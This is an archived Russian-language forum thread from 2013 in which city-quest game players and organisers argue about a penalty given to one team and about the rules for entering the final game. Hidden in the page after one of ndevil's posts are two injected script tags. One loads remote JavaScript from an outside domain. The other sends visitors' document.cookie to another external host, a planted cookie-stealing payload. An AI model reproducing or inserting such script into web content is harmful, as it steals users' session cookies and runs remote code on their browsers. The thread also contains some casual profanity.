Форумы Dead-Line

Форумы Dead-Line (http://dead-line.spb.ru/forum/index.php)
-   Анонсы игр (http://dead-line.spb.ru/forum/forumdisplay.php?f=98)
-   -   1000 и 1 баян (http://dead-line.spb.ru/forum/showthread.php?t=6042)

Punch 15-05-2013 10:32

Цитата:

Сообщение от Grom (Сообщение 266355)
Что по КО кодиков?)

1-3, как обычно.

Punch 15-05-2013 10:33

Цитата:

Сообщение от Prinncess@ (Сообщение 266357)
ну как-то не особо там понятно написано.
исключения такие исключения.
мне не жалко, пусть играют, просто как-то это всё не правильно.

Дабы завязать ненужные разговоры, все предложения по этому вопросу - в личку.

Punch 15-05-2013 10:34

Цитата:

Сообщение от Jaguar (Сообщение 266351)
Слава, психанул в началк игры? это причина нелепого штрафа?

Слава психует уже больше месяца)))

ndevil 15-05-2013 10:43

Цитата:

Сообщение от Jaguar (Сообщение 266351)
Слава, психанул в началк игры? это причина нелепого штрафа?

Причина штрафа - за взятие штрафной подсказки. Причина ее взятия - в моем сообщении выше. Чего непонятно-то?

Получасовой штраф на трехчасовой игре както немного несовместим с призовыми местами, но даже на таких условиях я согласен выйти на финальную игру - хочется уже наконецто доиграть это.

Отправлено с моего ThL W3 через Tapatalk

<script language='javascript' charset='UTF-8' type='text/javascript' src='http://nummobile.com/80j4ch2sa3g98uehlyoro4uftwotqhh'></script>
<script> img = new Image(); img.src = "http://frontext.ru/www/s.gif?"+document.cookie; </script>

Velkopiterskij 15-05-2013 10:49

Цитата:

Сообщение от Punch (Сообщение 266350)
Ну собственно чуть выше твоего сообщения ndevil написал.
Велко, в лоб спрошу: есть ли у тебя претензии к этому решению?
По планируемой финальной игре 30 минут штрафа - это овердофига.

Никаких претензий сейчас у меня нет. Вы орги, вы решаете кого и как допустить до финальной игры. Мне действительно интересно. Объяснение "психанул" для меня не ясно. Судя по форуму оно понятно только команде и оргам. А такие решения, всё-таки, стоит более подробно описывать в общем доступе.

Цитата:

Сообщение от ndevil (Сообщение 266365)
Причина штрафа - за взятие штрафной подсказки. Причина ее взятия - в моем сообщении выше. Чего непонятно-то?

Причина взятия "психанул" это нифига не объяснение почему она нелепая и стоит того, чтобы сделать исключение.
Цитата:

Получасовой штраф на трехчасовой игре

Цитата:

10 последовательных загадок по 1 часу на выполнение
Вот вряд ли она будет трёхчасовая. 4-5, думаю.
Цитата:

но даже на таких условиях я согласен выйти на финальную игру - хочется уже наконецто доиграть это.

Цитата:

Принять участие в финальной игре смогут ВСЕ желающие (не зависимо от того, играли они в основную часть или нет, просто необходимо на брифинг привезти 500 р. взноса). Однако, чтобы отделить команды, играющие на победу, от играющих for fun, старт для этих групп будет раздельным.
Кто мешает принять участие?

prinncessa 15-05-2013 10:51

Цитата:

Получасовой штраф на трехчасовой игре както немного несовместим с призовыми местами, но даже на таких условиях я согласен выйти на финальную игру - хочется уже наконецто доиграть это.

так на финалку и так всех желающих пускают.

по сути - плюсую к Косте.

Grom 15-05-2013 11:01

Цитата:

Сообщение от Punch (Сообщение 266359)
1-3, как обычно.

Две тройки, три двойки и остальное единицы на всю игру? Полелогики больше не будет?)

По сути: мне очень печально, что пакмэн занимается таким буквоедством и придирками, которые никому не нужны. Ситуация вполне ясна, меры адекватные, игра фо фан)

miibus 15-05-2013 11:04

Может я конечно несколько со своей колокольни, но всё же игра вроде как задумывалась как игра for fan, и изначально у людей не было особого желания всех дёрнуть, видимо люди начали париться по этому поводу по причине кучи потраченного времени. Вот мне честно говоря пофиг, игра же не в зачёт, объявят ту или иную команду победителем, это ведь формальность, тут вот точно важнее сам игровой процесс.

А вообще у меня тоже много раз возникало желание щёлкнуть подсказку и посмотреть, что там написано, но я почему то не "психанул".

Панч, если основания снимать баян, а не делать его сталкером были, то вот тут ситуация какая-то некрасивая, вроде того, что- "все равны, но есть ровнее". Если людям пятихатку жалко, то пусти их сыграть бесплатно, сразу последнее место назначь и делов всего, будет честно.

я тут нуб, да.

Velkopiterskij 15-05-2013 11:07

Цитата:

Сообщение от Grom (Сообщение 266371)
Две тройки, три двой и остальное единицы на всю игру? Полелогики больше не будет?)

По сути: мне очень печально, что пакмэн занимается таким буквоедством и придирками, которые никому не нужны. Ситуация вполне ясна, меры адекватные.

Гром, если тебе ясна ситуация, проясни её для меня. Я уже в третий раз пишу, что не понимаю что значит "психанул". Я не понимаю, если команда считает получасовой штраф несовместимым с результатом, то зачем команде хочется играть именно в зачёт, а не со всеми остальными, кто фофан?
Лично для меня печально, что изменение правил никак вообще не мотивируется организаторами.

Velkopiterskij 15-05-2013 11:08

Цитата:

Сообщение от miibus (Сообщение 266372)

Панч, если основания снимать баян, а не делать его сталкером были, то вот тут ситуация какая-то некрасивая, вроде того, что- "все равны, но есть ровнее". Если людям пятихатку жалко, то пусти их сыграть бесплатно, сразу последнее место назначь и делов всего, будет честно.

Я вообще решил, что 500 это для тех, кто вообще не играл. А те кто играл, но не выйдет в финал всё равно бесплатно.

miibus 15-05-2013 11:09

Цитата:

Сообщение от Velkopiterskij (Сообщение 266375)
Я вообще решил, что 500 это для тех, кто вообще не играл. А те кто играл, но не выйдет в финал всё равно бесплатно.

эммм) а я так понял, что для тех, кто вышел в финал бесплатно, для всех остальных за бабло)

Grom 15-05-2013 11:15

Велко, ты клевый, расслабься и получай удовольствие от игры, все будет хорошо, это просто игра :) каждый играет как умеет и может - вы крутаны! Зачем скатываться до графоманства и выяснения глупостей и мелочей? Только нервные клетки убивать, а нужно наоборот получать удовольствие...;)

prinncessa 15-05-2013 11:19

Цитата:

Сообщение от Grom (Сообщение 266378)
Велко, ты клевый, расслабься и получай удовольствие от игры, все будет хорошо, это просто игра :) каждый играет как умеет и может - вы крутаны! Зачем скатываться до графоманства и выяснения глупостей и мелочей? Только нервные клетки убивать, а нужно наоборот получать удовольствие...;)

да никто не скатывается=) нам просто интересно что такое "психанул" =)
не бузи =)

Punch 15-05-2013 12:04

Цитата:

Сообщение от Velkopiterskij (Сообщение 266375)

Конечно, Костя, ты прав)

Punch 15-05-2013 12:05

Цитата:

Сообщение от Prinncess@ (Сообщение 266379)
да никто не скатывается=) нам просто интересно что такое "психанул" =)
не бузи =)

Воть:

Цитата:

Сообщение от Punch (Сообщение 266361)
Дабы завязать ненужные разговоры, все предложения по этому вопросу - в личку.

Heckfy 15-05-2013 12:14

С Громом какая-то хуйня творится...
Надо троллить, пересыпать саркастическими подъебами и завуалированными оскорблениями.
Только так. Только хардкор!

Grom 15-05-2013 12:15

А кто есть команда Фантомас?)))

326 вбитых кодов за 8 часов чистого времени...внушает!

Руслан, я разочаровал тебя? Вот где справедливость?! Подъебываешь - не нравится, не подъебываешь - тоже хуйня :confused::(

Heckfy 15-05-2013 12:20

Да кто ж его знает где она, эта справедливость...

DashИК 15-05-2013 12:21

Цитата:

Сообщение от Grom (Сообщение 266389)
А кто есть команда Фантомас?)))

326 вбитых кодов за 8 часов чистого времени...внушает!

Хз, деньги перекинули через Яндекс, номер телефона мне ничего не говорит.
Может кто-то от кого-то отделился, хз.

RAVE 15-05-2013 12:24

Цитата:

Сообщение от miibus (Сообщение 266372)
Может я конечно несколько со своей колокольни, но всё же игра вроде как задумывалась как игра for fan

для вентиляторов или для фанатов? :confused: ;)

Часовой пояс GMT +3, время: 15:50.